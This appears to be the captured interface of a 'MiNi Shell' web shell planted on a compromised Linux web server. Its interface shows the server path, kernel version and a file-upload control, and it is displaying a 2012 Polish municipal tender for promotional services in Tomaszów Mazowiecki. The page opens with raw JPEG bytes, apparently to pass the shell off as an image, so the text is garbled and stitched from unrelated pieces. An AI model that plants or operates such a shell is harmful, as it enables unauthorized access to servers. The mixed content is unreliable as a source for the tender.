JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120703/232366-N-2012.html

<p class="kh_header"><b>Tomaszów Mazowiecki: Przeprowadzenie działań promocyjnych i informacyjnych dla projektu: Przygotowanie terenów na obszarach objętych rewitalizacją pod realizację nowych inwestycji gospodarczych</b><br>
<b>Numer ogłoszenia: 232366 - 2012; data zamieszczenia: 03.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Tomaszów Mazowiecki , ul. POW 10/16, 97-200 Tomaszów Mazowiecki, woj. łódzkie, tel. 44 724 23 11, faks 44 724 43 59.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tomaszow-maz.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie działań promocyjnych i informacyjnych dla projektu: Przygotowanie terenów na obszarach objętych rewitalizacją pod realizację nowych inwestycji gospodarczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie działań promocyjnych i informacyjnych dla projektu: Przygotowanie terenów na obszarach objętych rewitalizacją pod realizację nowych inwestycji gospodarczych
Działania promocyjne będą prowadzone zgodnie z rozporządzeniem Rady (WE) nr 1083-2006, rozporządzeniem Komisji 1828/2006 z dn. 8.12.2006 r. Oraz rozporządzeniem WE nr 1080/2006 Parlamentu Europejskiego i rady w sprawie Europejskiego Funduszu Rozwoju Regionalnego  oraz Wytycznymi dotyczącymi promocji projektów dla beneficjentów Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007 - 2013. Wszystkie materiały informacyjne i promocyjne, a także dokumenty stosowane podczas realizacji projektu będą zawierać odpowiednie znaki graficzne oraz logotypy. 
 Szczegółowy opis przedmiotu zamówienia znajduje się w  IV części SIWZ - SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA. Przedmiot zamówienia podzielony został na 4 części..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.34.00.00-9, 79.34.00.00-9, 79.34.22.00-5, 92.21.00.00-6, 92.21.10.00-3, 39.29.41.00-0, 30.19.21.21-5, 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu spełnienia niniejszego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy
2. pełnomocnictwo</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Termin wykonania poszczególnych instrumentów informacyjnych i promocyjnych składających się na przedmiot umowy może ulec zmianie w przypadku:
1.)	istotnych zmian w wytycznych/instrukcjach Instytucji Zarządzającej/Instytucji Pośredniczącej, dotyczących zasad obowiązujących przy realizacji działań informacyjnych i promocyjnych Projektów współfinansowanych z Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007 - 2013.
2.)	zmiany istotnych postanowień umowy, w okolicznościach działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony umowy nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki utrudniają lub uniemożliwiają wykonanie umowy zgodnie z jej treścią.
3.)	zmiany przepisów prawa mających wpływ na zakres lub terminy wykonania przedmiotu umowy.
4.)	zmian korzystnych dla Zamawiającego.
2.	Zamawiający dopuszcza możliwość zmiany wynagrodzenia w przypadku ustawowej zmiany podatku od towarów i usług (VAT).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.tomaszow-maz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Tomaszowie Mazowiecki
Wydział Inwestycji
ul. Mościckiego 6 pok.6
97-200 Tomaszów Mazowiecki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.07.2012 godzina 11:00, miejsce: Urząd Miasta w Tomaszowie Mazowiecki
Kancelaria ogólna
ul. P.O.W. 10/16
97-200 Tomaszów Mazowiecki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Postępowanie o udzielenie zamówienia publicznego prowadzone jest w ramach projektu 
pn Przeprowadzenie działań promocyjnych i informacyjnych dla projektu: 
Przygotowanie terenów na obszarach objętych rewitalizacją pod realizację nowych inwestycji gospodarczych.
Konkurs dla naboru nr 1 wniosków o dofinansowanie projektów 
w ramach Osi Priorytetowej VI Odnowa obszarów miejskich 
Działanie VI.1 Rewitalizacja obszarów problemowych 
w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007-2013 
Umowa o dofinansowanie UDA-RPLD.06.01.00-00-031/11-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TABLICE INFORMACYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie tablic informacyjnych - sztuk 3

Wykonawca jest zobowiązany do wykonania i montażu tablic informacyjnych w ilości sztuk -  3 w miejscu realizacji projektu, w terminie nieprzekraczalnym 14 dni od dnia podpisaniu umowy. Rozmiar i treść musi być zgodna z Wytycznymi dotyczącymi promocji projektów dla beneficjentów Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2007 - 2013 lub na stronie internetowej 
www.rpo.lodzkie.pl
Tablica informacyjna musi zawierać następujące elementy:
a) emblemat Unii Europejskiej z odwołaniem słownym do Unii Europejskiej oraz odwołaniem słownym do Europejskiego Funduszu Rozwoju Regionalnego, logo RPO WŁ, powyższe  informacje muszą zajmować co najmniej 25% powierzchni tablicy,
b) informację o współfinansowaniu ze środków Unii Europejskiej: 
Projekt współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego
c) Na tablicy podaje się: 
 -  nazwę inwestycji (numer i tytuł projektu); 
 - całkowitą wartość projektu (wartość z umowy o dofinansowanie, zaokrąglona 
do pełnych złotych);  
 - kwotę dofinansowania z EFRR (wartość z umowy o dofinansowanie, 
zaokrąglona do pełnych złotych); 
-  nazwę beneficjenta; 
 -  hasło określone przez instytucję zarządzającą RPO  WŁ Fundusze Europejskie dla rozwoju regionu łódzkiego; 
Wykonawca zobowiązany będzie do wykonania na stelażu metalowym z profili metalowych pokrytych  farbą  antykorozyjną  tablicy informacyjnej (tło tablicy - kolor biały) 
o wymiarach 2m x 1,5m z PCV o grubości min.5mm. Zamawiający wymaga, aby tablica informacyjna była wykonana z materiałów trwałych, tj. odpornych na warunki atmosferyczne, dzięki czemu zapewniona zostanie czytelność informacji oraz wysoki poziom estetyczny tablicy.
Szczegóły zawartości merytorycznej tablicy informacyjnej do uzgodnienia z Zamawiającym. Wykonawca winien uwzględnić w cenie oferowanej tablicy możliwość aktualizacji treści 
w szczególności kwot zadania w przypadku ich zmiany..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.10.00-6, 79.34.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> OGŁOSZENIA W PRASIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II.1. Ogłoszenie promujące projekt w prasie reklama modułowa 

					Reklama modułowa

Wykonawca zobowiązany jest do opracowania  i  publikacji w  prasie  o  zasięgu regionalnym (zasięg minimum powiatu tomaszowskiego) o nakładzie minimum 10 000 sztuk reklamy modułowej promującej realizację Projektu. - ilość sztuk 1 (zgodnie z harmonogramem realizacji działań promocyjnych)
Minimalny powierzchnia ogłoszenia 150,00 cm2. Druk kolorowy. Treść i termin publikacji będzie uzgodniony z Zamawiającym. 
II.2. Ogłoszenie promujące projekt w prasie artykuł sponsorowany 

					Artykuł sponsorowany

Wykonawca zobowiązany jest do opracowania  i publikacji w prasie o zasięgu regionalnym 
(zasięg minimum powiatu tomaszowskiego) o nakładzie minimum 10 000 sztuk artykułów prasowych o tematyce związanej z realizowanym projektem - ilość  sztuk 1 (zgodnie z harmonogramem realizacji działań promocyjnych)
Minimalny format artykułu - 12 modułów (166 x 183mm, 109 x 277mm lub 223 x 136mm lub inny). Druk kolorowy. Treść artykułu do uzgodnienia i akceptacji z Zamawiającym

Ogłoszenia modułowe oraz artykuły sponsorowane, o których mowa powyżej winny zostać umieszczone  na stronach redakcyjnych lub w kolumnach ogłoszeniowych.
Zamawiający nie dopuszcza możliwości zastosowania innej formy reklamy prasowej np. insertu umieszczanego w luźno  do danego tytułu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.34.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRODUKCJA I EMISJA AUDYCJI RADIOWEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkcja i emisja audycji radiowej 

W trakcie realizacji projektu Wykonawca zobowiązany jest do produkcji spotu radiowego 
i jego emisji  w rozgłośni radiowej obejmującym swoim zasięgiem teren minimum powiatu tomaszowskiego z wyłączeniem rozgłośni radia internetowego.
Wymagania dotyczące spotów reklamowych: produkcja  spotu  (ilość emisji spotów - 20 emisji,  emitowane w trakcie trwania realizacji projektu, czas trwania każdego ze spotów - ok. 40 sekund, emisja spotu (od poniedziałku do niedzieli w godzinach 10.00-18.00). Treść oraz termin emisji spotów będzie uzgodniony z Zamawiającym. Wykonawca zobowiązuje się do zapisywania audycji na nośniku elektronicznym i przekazywania Zamawiającemu na koniec okresu rozliczeniowego wraz z fakturą VAT..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 92.21.00.00-6, 92.21.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WYKONANIE I DOSTAWA MATERIAŁÓW   PROMOCYJNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> . Materiały promocyjne:

Wykonawca wykona i dostarczy do siedziby Zamawiającego następujące materiały promocyjne opatrzone dostarczonymi logotypami.  

Długopisy - 1000 szt. 
OPIS:
- Biały korpus, 
- kolorowy transparentny klip, 
- kolorowa gumka,
- kolorowy nadruk na korpusie  - logo Rewitalizacji Centrum Miasta oraz emblematy Unii Europejskiej i Regionalnego Programu Operacyjnego Województwa Łódzkiego, 
- chromowany przycisk   

Brelok - 650 szt.
 OPIS:
- brelok z lampką, 
-  plastic + metal, 
- kolorowy nadruk - logo Rewitalizacji Centrum Miasta oraz emblematy Unii Europejskiej i Regionalnego Programu Operacyjnego Województwa Łódzkiego,
- dopuszczalna kolorystyka: czerwień, bordo, niebieski, czarny, szary 

Materiały promocyjne, o których mowa powyżej tj. mogą zostać dostarczone w postaci tzw. mixów kolorystycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0, 30.19.21.21-5, 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com